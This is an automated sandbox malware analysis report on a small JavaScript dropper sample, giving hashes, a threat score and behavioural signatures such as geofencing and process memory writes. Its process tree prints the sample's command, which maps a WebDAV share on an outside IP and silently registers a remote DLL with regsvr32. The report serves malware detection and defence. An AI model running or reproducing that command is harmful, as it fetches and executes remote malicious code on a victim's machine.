Analysis
-
max time kernel
140s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 04:24
Static task
static1
Behavioral task
behavioral1
Sample
23312213452009432234.js
Resource
win7-20240705-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
23312213452009432234.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
23312213452009432234.js
-
Size
3KB
-
MD5
3f1cdde0e714fc72fba22fe9a4b1de27
-
SHA1
e9e8a2e0d9f562d349bf19a673724f6bad2c1683
-
SHA256
95dce3345ff7b76bedd40f29b889dbc67f14a5ac8c692bb1a4ca0a485b94f9fb
-
SHA512
a5d9a32b8a865602a461a391a7aebf3c7df37c0cff981766f83f5ca4dba57db60a31cf830899d8b7f3a7042a14c54a9e57c5055d29374af5911c03f6d3420f3f
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3400 wrote to memory of 1504 3400 wscript.exe 84 PID 3400 wrote to memory of 1504 3400 wscript.exe 84 PID 1504 wrote to memory of 548 1504 cmd.exe 86 PID 1504 wrote to memory of 548 1504 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\23312213452009432234.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\15482190676437.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:548
-
-